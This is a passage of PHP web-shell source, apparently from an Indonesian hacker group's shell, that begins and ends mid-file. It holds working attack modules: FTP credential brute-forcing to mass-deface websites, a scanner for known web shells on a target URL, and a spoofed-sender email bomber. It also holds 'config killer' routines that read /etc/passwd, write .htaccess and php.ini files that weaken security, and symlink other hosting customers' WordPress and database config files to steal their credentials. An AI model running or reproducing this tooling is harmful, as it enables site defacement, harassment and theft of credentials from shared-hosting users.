- Index File Name:<input type="text" name="index_name" value="index.php" /><br>
- <p> </p>
- Index File Link:<input type="text" name="index_link" value="index.txt" /><br>
- <p> </p>
- <input type="submit" name="forest" value="Mass Deface it" /><br><br>
- </form></center>
- <?php
- set_time_limit(0);
- if(isset($_POST['forest'])){
- $ip=trim($_POST['ip']);
- $users = explode("\n",$_POST["users"]);
- $passwords = explode("\n",$_POST["passwords"]);
- $index_name=trim($_POST['index_name']);$index_link=trim($_POST['index_link']);
- foreach($users as $user){
- foreach($passwords as $pass){
- $connect_ip = ftp_connect($ip) or die("Couldn't Connect To $ip");
- if(@ftp_login($connect_ip, trim($user), trim($pass))){
- echo "<br>Connected To --> $ip@$user\n";@ftp_delete($connect_ip,$index_name);
- $deface = ftp_put($connect_ip, "/public_html/".$index_name , $index_link, FTP_ASCII);
- if($deface){
- echo "<br><font color=green> $user --> Deface Success!!</font>";
- break;
- }else{
- echo "<br><font color=red> $user --> Error Defacing!!</font>";
- }
- }else{
- echo "<br><font color=red>Couldn't Connect To --> $ip@$user --> $pass</font>\n";
- }
- }
- }
- echo "<br><font size=5> ! Mass Defacing Was Done ! </font>";
- }
- ?>
- <?php }
- # x=sscan
- elseif(isset($_GET['x']) && ($_GET['x'] == 'sscan')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=sscan" method="post">
- <br><br><center><div id=result> <nobr><b><span class='b7'>O=:[ SHELL</span> <span class='b8'>SCANNER ]:=O</span></b></nobr><br/><br/>
- <table><form method='POST'>
- <tr><td>URL TARGET : <input size=40 style='color:#FF0000;background-color:#000000' name='rem_web' value='http://'></td></tr>
- <tr><td><font color=red>INPUT NAMA FILE / SHELL</font></tr></td>
- <tr><td><textarea spellcheck='false' class='textarea_edit' style='color:#FF0000;background-color:#000000' cols=50 rows=30 name='tryzzz'>
- WSO.php
- dz.php
- cpanelcracker.php
- blackshadow.php
- sym.php
- ftpcracker.php
- cpanel.php
- cpn.php
- sql.php
- mysql.php
- madspot.php
- itsecteam_shell.php
- b374k.php
- madsopot.php
- indishell.php
- Cgishell.pl
- killer.php
- changeall.php
- 2.php
- Sh3ll.php
- dz0.php
- dam.php
- user.php
- dom.php
- whmcs.php
- r00t.php
- c99.php
- gaza.php
- q.php
- 1.php
- d0mains.php
- madspotshell.php
- Sym.php
- c22.php
- c100.php
- Cpanel.php
- zone-h.php
- cp.php
- L3b.php
- d.php
- admin1.php
- upload.php
- up.php
- uploads.php
- sa.php
- r57.php
- shell.php
- sa.php
- </textarea></td></tr>
- <tr><td><br /><input type='submit' style='color:#FF0000;background-color:#000000' value=' >> SCAN >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />
- <?php
- set_time_limit(0);
- $rtr=array();
- echo "<div id=result><center><table>";
- $webz=$_POST['rem_web'];
- $uri_in=$_POST['tryzzz'];
- $r_xuri = trim($uri_in);
- $r_xuri=explode("\n", $r_xuri);
- foreach($r_xuri as $rty)
- {
- $urlzzx=$webz.$rty;
- if(function_exists('curl_init'))
- {
- echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
- $ch = curl_init($urlzzx);
- curl_setopt($ch, CURLOPT_NOBODY, true);
- curl_exec($ch);
- $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- if($status_code==200)
- {
- echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
- } else {
- echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
- }
- } else {
- echo "<font color=red>cURL Not Found </font>";
- } }
- echo "</table><br /><br /><hr /><br /><br /></div>";
- ?>
- <?php }
- # x=bomail
- elseif(isset($_GET['x']) && ($_GET['x'] == 'bomail')){
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=email" method="post">
- <html>
- <head><title>./DM TE4M</title>
- </head>
- <center><body bgcolor="black">
- <a href="http://www.facebook.com/groups/D.MASTERPIECE"><img src="http://img59.imageshack.us/img59/9402/headerpicsay.jpg" border="0" width="200" height="50"></a><br><br>
- <span style="color:white"> --=|[+] BOMB FAKE EMAIL [+]|=--<br/></center>
- <span style="color:#00FF00"><hr></span>
- <form method=post>
- <input type=hidden value=dm name=dm>
- <center><span style="color:#00FF00">-:[ X-EMAIL ]:-</span><br/>
- <span style="color:white">**Isi Dengan Nama Email Palsu**<br/>
- <input style="color:lime;background-color:#000000" name=wew value="<?echo $wew; ?>"></center>
- <br/>
- <center><span style="color:#00FF00">-:[ EMAIL TUJUAN ]:-</span><br/>
- <span style="color:white">**Isi Email Target Bomb Email**</span><br/>
- <input style="color:lime;background-color:#000000" name=wow value="<?echo $wow; ?>"></center>
- <br/>
- <center><span style="color:#00FF00">-:[ SUBJECT ]:-</span> <br/>
- <span style="color:white">**Isi Nama Judul Pesan**</span><br/>
- <input style="color:lime;background-color:#000000" name=anu value="<?echo $anu; ?>"></center>
- <br/>
- <center><span style="color:#00FF00">-:[ JUMLAH KIRIM ]:-</span><br/>
- <span style="color:white">**Isi Nominal Antara 0 s/d 100**</span><br/>
- <input style="color:lime;background-color:#000000" name=sodok value="<?echo $sodok; ?>"></center>
- <br/>
- <center><span style="color:#00FF00">-:PESAN ]:-</span><br/>
- <span style="color:white">**Tulis Pesan Kamu**</span><br/>
- <textarea style="color:lime;background-color:#000000" cols="30" rows="50" name=deathnote><?echo $deathnote?></textarea><br/>
- <p>
- <input style="color:lime;background-color:#000000" type=submit value=./CROTZ></center></form>
- <span style="color:#00FF00"><hr></span>
- <span style="color:yellow">
- <?php
- //DMASTERPIECE TE4M Introduction
- $dm = $_POST['dm'];
- //Fungsi Pengirim Email
- $wew = $_POST['wew'];
- //Fungsi Penerima Email
- $wow = $_POST['wow'];
- //Fungsi Jumlah Pesan Yg Akan Di Kirim
- $sodok = $_POST['sodok'];
- //Fungsi Subject Atau Judul
- $anu = $_POST['anu'];
- //Fungsi Isi Pesan
- $deathnote = $_POST['deathnote'];
- if ($dm=="dm" ) {
- for ($i=0;$i <$sodok;$i++) {
- $a= $wew;
- $janda = $anu.$i;
- mail( $wow,$janda,$deathnote.str_repeat(" ", 0*$xdm),"From: $a <$a>\r\n" );
- } echo (" <center>* SUKSES :D | HAJAR LAGI BOS :P *</center>");
- }
- //WE ARE DMASTERPIECE
- //WE ARE LEGION
- //WE ARE FAMILY
- //WE DO NOT FORGIVE
- //WE DO NOT FORGET
- //EXPECT US
- exit;
- ?>
- <?php }
- # x=plesk
- elseif(isset($_GET['x']) && ($_GET['x'] == 'plesk')){ ?>
- <form action="?dm=<?php echo $pwd; ?>&x=plesk" method="post">
- <?php
- @mkdir('plesk', 0777);
- $hta="Options all \n
- DirectoryIndex Sux.html \n
- AddType text/plain .php\n
- AddHandler server-parsed .php";
- $htaccess=@fopen('plesk/.htaccess', 'w');
- fwrite($htaccess, $hta);
- @symlink("/", "plesk/dm.txt");
- ?>
- <?php }
- // x=apache
- elseif(isset($_GET['x']) && ($_GET['x'] == 'apache')){
- // symlink apache + config killer
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=apache" method="post">
- <?php
- $head = '
- <html>
- <head>
- </script>
- <title>APACHE</title>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <script language=\'javascript\'>
- function hide_div(id)
- {
- document.getElementById(id).style.display = \'none\';
- document.cookie=id+\'=0;\';
- }
- function show_div(id)
- {
- document.getElementById(id).style.display = \'block\';
- document.cookie=id+\'=1;\';
- }
- function change_divst(id)
- {
- if (document.getElementById(id).style.display == \'none\')
- show_div(id);
- else
- hide_div(id);
- }
- </script>'; ?>
- <html>
- <head>
- <?php echo $head; ?>
- <body bgcolor=black><center><br/><br/> <img src="http://silk.apana.org.au/graphics/apache_logo.gif">
- <form method=post><br/><br/>
- <nobr><b><span class='b7'>O=:[ APACHE</span> <span class='b8'>TOOLS ]:=O</span></b></nobr><br/><br/>
- <p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
- <?php
- if(isset($_POST['usre'])){
- ?>
- <form method=post>
- <textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><br><br>
- <input type=submit style=color:#FF0000;background-color:#000000 name=su value="EXECUTE" /></form><br/>
- <?php } ?>
- <?php
- error_reporting(0);
- if(isset($_POST['su'])){
- mkdir('dm',0777);
- $rr = "Options all \r
- DirectoryIndex Sux.html \r
- AddType text/plain .php \r
- AddType text/plain .html \r
- AddType text/plain .bak \r
- AddType text/plain .old \r
- AddHandler server-parsed .php \r
- AddHandler txt .html \r
- Require None \r Satisfy Any";
- $g = fopen('dm/.htaccess','w');
- fwrite($g,$rr);
- $dm = symlink("/","dm/dm.txt");
- $rt="<a href=dm/dm.txt><b><span class='b11'>[ SYMLINK ]</span></b></a>";
- echo "<nobr>[~] ";
- echo "$rt";
- $dir=mkdir('DM',0777);
- $r = "Options all \r
- DirectoryIndex Sux.html \r
- AddType text/plain .php \r
- AddType text/plain .html \r
- AddType text/plain .bak \r
- AddType text/plain .old \r
- AddHandler server-parsed .php \r
- AddHandler txt .html \r
- Require None \r
- Satisfy Any";
- $f = fopen('DM/.htaccess','w');
- fwrite($f,$r);
- $consym="<a href=DM/><b><span class='b11'>[ CONFIG KILLER ]</span></b> </a>";
- echo " [~] ";
- echo "$consym";
- echo " [~]</nobr>";
- $usr=explode("\n",$_POST['user']);
- $configuration=array(
- "aksi.php",
- "aksi.php.old",
- "aksi.php.bak",
- "conf.php",
- "conf.php.old",
- "conf.php.bak",
- "conf_global.php",
- "conf_global.php.old",
- "conf_global.php.bak",
- "config.php",
- "config.php.old",
- "config.php.bak",
- "configuration.php",
- "configuration.php.old",
- "configuration.php.bak",
- "conn.php",
- "conn.php.old",
- "conn.php.bak",
- "connect.php",
- "connect.php.old",
- "connect.php.bak",
- "connection.php",
- "connection.php.old",
- "connection.php.bak",
- "db.php",
- "db.php.old",
- "db.php.bak",
- "database.php",
- "database.php.old",
- "database.php.bak",
- "inc.php",
- "inc.php.old",
- "inc.php.bak",
- "koneksi.php",
- "koneksi.php.old",
- "koneksi.php.bak",
- "mysql.php",
- "myqsl.php.old",
- "mysql.php.bak",
- "setting.php",
- "setting.php.old",
- "setting.php.bak",
- "Settings.php",
- "Settings.php.old",
- "Settings.php.bak",
- "sql.php",
- "sql.php.old",
- "sql.php.bak");
- foreach($usr as $uss ){
- $us=trim($uss);
- foreach($configuration as $c){
- $rs="/home/".$us."/public_html/".$c;
- $r="DM/".$us."~".$c;
- symlink($rs,$r);
- }
- }
- }
- ?>
- <?php }
- // x=hostgator
- elseif(isset($_GET['x']) && ($_GET['x'] == 'hostgator')){
- // symlink hostgator + config killer
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=hostgator" method="post">
- <?php
- $head = '
- <html>
- <head><title>HOSTGATOR</title>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <script language=\'javascript\'>
- function hide_div(id){
- document.getElementById(id).style.display = \'none\';
- document.cookie=id+\'=0;\';
- }
- function show_div(id){
- document.getElementById(id).style.display = \'block\';
- document.cookie=id+\'=1;\';
- }
- function change_divst(id){
- if (document.getElementById(id).style.display == \'none\')
- show_div(id);
- else
- hide_div(id);
- }
- </script>'; ?>
- <html>
- <head>
- <?php echo $head; ?>
- <body bgcolor=black><center><br/><br/><img src="http://partnernoc.cpanel.net/logo/822-4021-logo.png">
- <form method=post><br/><br/>
- <nobr><b><span class='b7'>O=:[ HOSTGATOR</span> <span class='b8'>TOOLS ]:=O</span></b></nobr><br/><br/>
- <p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
- <?php
- if(isset($_POST['usre'])){
- ?>
- <form method=post>
- <textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd");
- foreach($users as $user){
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><br><br>
- <input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
- <?php } ?>
- <?php
- error_reporting(0);
- if(isset($_POST['su'])){
- mkdir('hostgator',0777);
- $r = "Options +FollowSymLinks \n
- DirectoryIndex Sux.html \n
- Options +Indexes \n
- AddType text/plain .php \n
- AddHandler server-parsed .php \n
- AddType text/plain.html ";
- $g = fopen('hostgator/.htaccess','w');
- fwrite($g,$rr);
- $dm = symlink("/","hostgator/dm.ini");
- $rt="<a href=hostgator/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>";
- echo "<nobr>[~] ";
- echo "$rt";
- $dir=mkdir('HOSTGATOR',0777);
- $rr = "Safe_mode = OFF \n
- Disable_functions = NONE \n
- Open_basedir = OFF";
- $f = fopen('HOSTGATOR/php.ini','w');
- fwrite($f,$rr);
- $rrr = "Options +FollowSymLinks \n
- DirectoryIndex Sux.html \n
- Options +Indexes \n
- AddType text/plain .php \n
- AddHandler server-parsed .php \n
- AddType text/plain.html ";
- $ff = fopen('HOSTGATOR/.htaccess','w');
- fwrite($ff,$rrr);
- $consym="<a href=HOSTGATOR/>
- <span class='b11'>[ CONFIG KILLER ]</span></b></a>";
- echo " [~] ";
- echo "$consym";
- echo " [~]</nobr>";
- $usr=explode("\n",$_POST['user']);
- $configuration=array("wp-config.ini",
- "wordpress/wp-config.ini",
- "configuration.ini",
- "blog/wp-config.ini",
- "joomla/configuration.ini",
- "vb/includes/config.ini",
- "includes/config.ini",
- "conf_global.ini",
- "inc/config.ini",
- "config.ini",
- "Settings.ini",
- "sites/default/settings.ini",
- "whm/configuration.ini",
- "whmcs/configuration.ini",
- "support/configuration.ini",
- "whmc/WHM/configuration.ini",
- "whm/WHMCS/configuration.ini",
- "whm/whmcs/configuration.ini",
- "support/configuration.ini",
- "clients/configuration.ini",
- "client/configuration.ini",
- "clientes/configuration.ini",
- "cliente/configuration.ini",
- "clientsupport/configuration.ini",
- "billing/configuration.ini",
- "admin/config.ini");
- foreach($usr as $uss ){
- $us=trim($uss);
- foreach($configuration as $c){
- $rs="/home/".$us."/public_html/".$c;
- $r="HOSTGATOR/".$us."~".$c;
- symlink($rs,$r);
- }
- }
- }
- ?>
- <?php }
- // x=bluehost
- elseif(isset($_GET['x']) && ($_GET['x'] == 'bluehost')){
- // symlink bluehost + config killer
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=bluehost" method="post">
- <?php
- $head = '
- <html>
- <head><title>BLUEHOST</title>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <script language=\'javascript\'>
- function hide_div(id){
- document.getElementById(id).style.display = \'none\';
- document.cookie=id+\'=0;\';
- }
- function show_div(id){
- document.getElementById(id).style.display = \'block\';
- document.cookie=id+\'=1;\';
- }
- function change_divst(id){
- if (document.getElementById(id).style.display == \'none\')
- show_div(id);
- else
- hide_div(id);
- }
- </script>'; ?>
- <html>
- <head>
- <?php echo $head; ?>
- <body bgcolor=black>
- <center><br/><br/>
- <img src="http://www.ananova.com/wp-content/uploads/2013/04/bluehost-review-by-toptenhostings.jpg">
- <form method=post><br/><br/><nobr><b><span class='b7'>O=:[ BLUEHOST</span> <span class='b8'>TOOLS ]:=O</span></b></nobr><br/><br/>
- <p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
- <?php
- if(isset($_POST['usre'])){
- ?>
- <form method=post>
- <textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd");
- foreach($users as $user){
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><br><br>
- <input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
- <?php } ?>
- <?php
- error_reporting(0);
- echo "<font color=white size=2 face=\"comic sans ms\">";
- if(isset($_POST['su'])){
- mkdir('bluehost',0777);
- $rr = "AllowOverride All None \n
- DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
- AddType application/octet-stream .php \n
- AddHandler server-parsed .php \n
- Addhandler cgi-script .asp \n
- AddType ini .php \n
- AddHandler ini .php";
- $g = fopen('bluehost/.htaccess','w');
- fwrite($g,$rr);
- $dm = symlink("/","bluehost/dm.ini");
- $rt="<a href=bluehost/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>";
- echo "<nobr>[~] ";
- echo "$rt";
- $dir=mkdir('BLUEHOST',0777);
- $r = "Options all \n DirectoryIndex Sux.html \n
- AddType text/plain .php \n
- AddHandler server-parsed .php \n
- AddType text/plain .html \n
- AddHandler txt .html \n
- Require None \n
- Satisfy Any";
- $f = fopen('BLUEHOST/.htaccess','w');
- fwrite($f,$r);
- $consym="<a href=BLUEHOST/><span class='b11'>[ CONFIG KILLER ]</span></b></a>";
- echo " [~] ";
- echo "$consym";
- echo " [~]</nobr>";
- $usr=explode("\n",$_POST['user']);
- $configuration=array("wp-config.ini",
- "wordpress/wp-config.ini",
- "configuration.ini",
- "blog/wp-config.ini",
- "joomla/configuration.ini",
- "vb/includes/config.ini",
- "includes/config.ini",
- "conf_global.ini",
- "inc/config.ini",
- "config.ini",
- "Settings.ini",
- "sites/default/settings.ini",
- "whm/configuration.ini",
- "whmcs/configuration.ini",
- "support/configuration.ini",
- "whmc/WHM/configuration.ini",
- "whm/WHMCS/configuration.ini",
- "whm/whmcs/configuration.ini",
- "support/configuration.ini",
- "clients/configuration.ini",
- "client/configuration.ini",
- "clientes/configuration.ini",
- "cliente/configuration.ini",
- "clientsupport/configuration.ini",
- "billing/configuration.ini",
- "admin/config.ini");
- foreach($usr as $uss ){
- $us=trim($uss);
- foreach($configuration as $c){
- $rs="/home/".$us."/public_html/".$c;
- $rs="/home1/".$us."/public_html/".$c;
- $rs="/home2/".$us."/public_html/".$c;
- $rs="/home3/".$us."/public_html/".$c;
- $rs="/home4/".$us."/public_html/".$c;
- $rs="/home5/".$us."/public_html/".$c;
- $rs="/home6/".$us."/public_html/".$c;
- $rs="/home7/".$us."/public_html/".$c;
- $rs="/home8/".$us."/public_html/".$c;
- $r="BLUEHOST/".$us."~".$c;
- symlink($rs,$r);
- }
- }
- }
- ?>
- <?php }
- // x=ovh
- elseif(isset($_GET['x']) && ($_GET['x'] == 'ovh')){
- // symlink ovh + config killer
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=ovh" method="post">
- <?php
- $head = '
- <html>
- <head><title>OVH</title>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <script language=\'javascript\'>
- function hide_div(id){
- document.getElementById(id).style.display = \'none\';
- document.cookie=id+\'=0;\';
- }
- function show_div(id){
- document.getElementById(id).style.display = \'block\';
- document.cookie=id+\'=1;\';
- }
- function change_divst(id){
- if (document.getElementById(id).style.display == \'none\')
- show_div(id);
- else
- hide_div(id);
- }
- </script>'; ?>
- <html>
- <head>
- <?php echo $head; ?>
- <body bgcolor=black><center><br/><br/><img src="http://alsace-international.eu/IMG/LOGOS/Entreprises/OVH_Logo.gif">
- <form method=post><br/><br/>
- <nobr><b><span class='b7'>O=:[ OVH</span> <span class='b8'>TOOLS ]:=O</span></b></nobr><br/><br/>
- <p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
- <?php
- if(isset($_POST['usre'])){
- ?>
- <form method=post>
- <textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd");
- foreach($users as $user){
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><br><br>
- <input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
- <?php } ?>
- <?php
- error_reporting(0);
- if(isset($_POST['su'])){
- mkdir('ovh',0777);
- $r = "AllowOverride All None \n
- DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
- AddType application/octet-stream .php \n
- AddHandler server-parsed .php \n
- Addhandler cgi-script .asp \n
- AddType ini .php \n
- AddHandler ini .php";
- $g = fopen('ovh/.htaccess','w');
- fwrite($g,$rr);
- $dm = symlink("/","ovh/dm.ini");
- $rt="<a href=ovh/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>";
- echo "<nobr>[~] ";
- echo "$rt";
- $dir=mkdir('OVH',0777);
- $rr = "Safe_mode = OFF \n
- Disable_functions = NONE \n
- Open_basedir = OFF";
- $f = fopen('OVH/php.ini','w');
- fwrite($f,$rr);
- $rrr = "AllowOverride All None \n
- DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
- AddType application/octet-stream .php \n
- AddHandler server-parsed .php \n
- AddHandler cgi-script .asp \n
- AddType ini .php \n
- AddHandler ini .php";
- $ff = fopen('OVH/.htaccess','w');
- fwrite($ff,$rrr);
- $consym="<a href=OVH/>
- <span class='b11'>[ CONFIG KILLER ]</span></b></a>";
- echo " [~] ";
- echo "$consym";
- echo " [~]</nobr>";
- $usr=explode("\n",$_POST['user']);
- $configuration=array("wp-config.ini",
- "wordpress/wp-config.ini",
- "configuration.ini",
- "blog/wp-config.ini",
- "joomla/configuration.ini",
- "vb/includes/config.ini",
- "includes/config.ini",
- "conf_global.ini",
- "inc/config.ini",
- "config.ini",
- "Settings.ini",
- "sites/default/settings.ini",
- "whm/configuration.ini",
- "whmcs/configuration.ini",
- "support/configuration.ini",
- "whmc/WHM/configuration.ini",
- "whm/WHMCS/configuration.ini",
- "whm/whmcs/configuration.ini",
- "support/configuration.ini",
- "clients/configuration.ini",
- "client/configuration.ini",
- "clientes/configuration.ini",
- "cliente/configuration.ini",
- "clientsupport/configuration.ini",
- "billing/configuration.ini",
- "admin/config.ini");
- foreach($usr as $uss ){
- $us=trim($uss);
- foreach($configuration as $c){
- $rs="/homez.0/".$us."/www/".$c;
- $rs="/homez.1/".$us."/www/".$c;
- $rs="/homez.2/".$us."/www/".$c;
- $rs="/homez.3/".$us."/www/".$c;
- $rs="/homez.4/".$us."/www/".$c;
- $rs="/homez.5/".$us."/www/".$c;
- $rs="/homez.6/".$us."/www/".$c;
- $rs="/homez.7/".$us."/www/".$c;
- $rs="/homez.8/".$us."/www/".$c;
- $rs="/homez.9/".$us."/www/".$c;
- $rs="/homez.10/".$us."/www/".$c;
- $rs="/homez.11/".$us."/www/".$c;
- $rs="/homez.12/".$us."/www/".$c;
- $rs="/homez.13/".$us."/www/".$c;
- $rs="/homez.14/".$us."/www/".$c;
- $rs="/homez.15/".$us."/www/".$c;
- $rs="/homez.16/".$us."/www/".$c;
- $rs="/homez.17/".$us."/www/".$c;
- $rs="/homez.18/".$us."/www/".$c;
- $rs="/homez.19/".$us."/www/".$c;
- $rs="/homez.20/".$us."/www/".$c;
- $rs="/homez.21/".$us."/www/".$c;
- $rs="/homez.22/".$us."/www/".$c;
- $rs="/homez.23/".$us."/www/".$c;
- $rs="/homez.24/".$us."/www/".$c;
- $rs="/homez.25/".$us."/www/".$c;
- $rs="/homez.26/".$us."/www/".$c;
- $rs="/homez.27/".$us."/www/".$c;
- $rs="/homez.28/".$us."/www/".$c;
- $rs="/homez.29/".$us."/www/".$c;
- $rs="/homez.30/".$us."/www/".$c;
- $rs="/homez.31/".$us."/www/".$c;
- $rs="/homez.32/".$us."/www/".$c;
- $rs="/homez.33/".$us."/www/".$c;
- $rs="/homez.34/".$us."/www/".$c;
- $rs="/homez.35/".$us."/www/".$c;
- $rs="/homez.36/".$us."/www/".$c;
- $rs="/homez.37/".$us."/www/".$c;
- $rs="/homez.38/".$us."/www/".$c;
- $rs="/homez.39/".$us."/www/".$c;
- $rs="/homez.40/".$us."/www/".$c;
- $rs="/homez.41/".$us."/www/".$c;
- $rs="/homez.42/".$us."/www/".$c;
- $rs="/homez.43/".$us."/www/".$c;
- $rs="/homez.44/".$us."/www/".$c;
- $rs="/homez.45/".$us."/www/".$c;
- $rs="/homez.46/".$us."/www/".$c;
- $rs="/homez.47/".$us."/www/".$c;
- $rs="/homez.48/".$us."/www/".$c;
- $rs="/homez.49/".$us."/www/".$c;
- $rs="/homez.50/".$us."/www/".$c;
- $rs="/homez.51/".$us."/www/".$c;
- $rs="/homez.52/".$us."/www/".$c;
- $rs="/homez.53/".$us."/www/".$c;
- $rs="/homez.54/".$us."/www/".$c;
- $rs="/homez.55/".$us."/www/".$c;
- $rs="/homez.56/".$us."/www/".$c;
- $rs="/homez.57/".$us."/www/".$c;
- $rs="/homez.58/".$us."/www/".$c;
- $rs="/homez.59/".$us."/www/".$c;
- $rs="/homez.60/".$us."/www/".$c;
- $rs="/homez.61/".$us."/www/".$c;
- $rs="/homez.62/".$us."/www/".$c;
- $rs="/homez.63/".$us."/www/".$c;
- $rs="/homez.64/".$us."/www/".$c;
- $rs="/homez.65/".$us."/www/".$c;
- $rs="/homez.66/".$us."/www/".$c;
- $rs="/homez.67/".$us."/www/".$c;
- $rs="/homez.68/".$us."/www/".$c;
- $rs="/homez.69/".$us."/www/".$c;
- $rs="/homez.70/".$us."/www/".$c;
- $rs="/homez.71/".$us."/www/".$c;
- $rs="/homez.72/".$us."/www/".$c;
- $rs="/homez.73/".$us."/www/".$c;
- $rs="/homez.74/".$us."/www/".$c;
- $rs="/homez.75/".$us."/www/".$c;
- $rs="/homez.76/".$us."/www/".$c;
- $rs="/homez.77/".$us."/www/".$c;
- $rs="/homez.78/".$us."/www/".$c;
- $rs="/homez.79/".$us."/www/".$c;
- $rs="/homez.80/".$us."/www/".$c;
- $rs="/homez.81/".$us."/www/".$c;
- $rs="/homez.82/".$us."/www/".$c;
- $rs="/homez.83/".$us."/www/".$c;
- $rs="/homez.84/".$us."/www/".$c;
- $rs="/homez.85/".$us."/www/".$c;
- $rs="/homez.86/".$us."/www/".$c;
- $rs="/homez.87/".$us."/www/".$c;
- $rs="/homez.88/".$us."/www/".$c;
- $rs="/homez.89/".$us."/www/".$c;
- $rs="/homez.100/".$us."/www/".$c;
- $rs="/homez.101/".$us."/www/".$c;
- $rs="/homez.102/".$us."/www/".$c;
- $rs="/homez.103/".$us."/www/".$c;
- $rs="/homez.104/".$us."/www/".$c;
- $rs="/homez.105/".$us."/www/".$c;
- $rs="/homez.106/".$us."/www/".$c;
- $rs="/homez.107/".$us."/www/".$c;
- $rs="/homez.108/".$us."/www/".$c;
- $rs="/homez.109/".$us."/www/".$c;
- $rs="/homez.110/".$us."/www/".$c;
- $rs="/homez.111/".$us."/www/".$c;
- $rs="/homez.112/".$us."/www/".$c;
- $rs="/homez.113/".$us."/www/".$c;
- $rs="/homez.114/".$us."/www/".$c;
- $rs="/homez.115/".$us."/www/".$c;
- $rs="/homez.116/".$us."/www/".$c;
- $rs="/homez.117/".$us."/www/".$c;
- $rs="/homez.118/".$us."/www/".$c;
- $rs="/homez.119/".$us."/www/".$c;
- $rs="/homez.120/".$us."/www/".$c;
- $rs="/homez.121/".$us."/www/".$c;
- $rs="/homez.122/".$us."/www/".$c;
- $rs="/homez.123/".$us."/www/".$c;
- $rs="/homez.124/".$us."/www/".$c;
- $rs="/homez.125/".$us."/www/".$c;
- $rs="/homez.126/".$us."/www/".$c;
- $rs="/homez.127/".$us."/www/".$c;
- $rs="/homez.128/".$us."/www/".$c;
- $rs="/homez.129/".$us."/www/".$c;
- $rs="/homez.130/".$us."/www/".$c;
- $r="OVH/".$us."~".$c; symlink($rs,$r);
- }
- }
- }
- ?>
- <?php }
- // x=litespeed
- elseif(isset($_GET['x']) && ($_GET['x'] == 'litespeed')){
- // symlink litespeed-nginx + config killer
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=litespeed" method="post">
- <?php
- $head = '
- <html>
- <head>
- </script>
- <title>LITESPEED - APACHE</title>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <script language=\'javascript\'>
- function hide_div(id)
- {
- document.getElementById(id).style.display = \'none\';
- document.cookie=id+\'=0;\';
- }
- function show_div(id)
- {
- document.getElementById(id).style.display = \'block\';
- document.cookie=id+\'=1;\';
- }
- function change_divst(id)
- {
- if (document.getElementById(id).style.display == \'none\')
- show_div(id);
- else
- hide_div(id);
- }
- </script>'; ?>
- <html>
- <head>
- <?php echo $head; ?>
- <body bgcolor=black><center><br/><br/> <img src="http://www.ftt.co.uk/images/nginx.png"><br/><img src="http://www.litespeedtech.com/images/litespeed/Subpage_misc/LSWS_logo.png">
- <form method=post><br/><br/>
- <nobr><b><span class='b7'>O=:[ LITESPEED - NGINX</span> <span class='b8'>TOOLS ]:=O</span></b></nobr><br/><br/>
- <p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
- <?php
- if(isset($_POST['usre'])){
- ?>
- <form method=post>
- <textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><br><br>
- <input type=submit style=color:#FF0000;background-color:#000000 name=su value="EXECUTE" /></form><br/>
- <?php } ?>
- <?php
- error_reporting(0);
- if(isset($_POST['su'])){
- mkdir('litespeed',0777);
- $rr = "Options +FollowSymlinks \r
- Options +IncludesNoExec -ExecCGI \r
- DirectoryIndex index.html index.shtml index.htm index.php \r
- RemoveHandler .php \r
- AddType text/html .shtml \r
- AddType application/octet-stream .php \r
- AddHandler server-parsed .shtml";
- $g = fopen('litespeed/.htaccess','w');
- fwrite($g,$rr);
- $dm = symlink("/","litespeed/dm.shtml");
- $rt="<a href=litespeed/dm.shtml><b><span class='b11'>[ SYMLINK ]</span></b></a>";
- echo "<nobr>[~] ";
- echo "$rt";
- $dir=mkdir('LITESPEED',0777);
- $r = "Options +FollowSymlinks \r
- Options +IncludesNoExec -ExecCGI \r
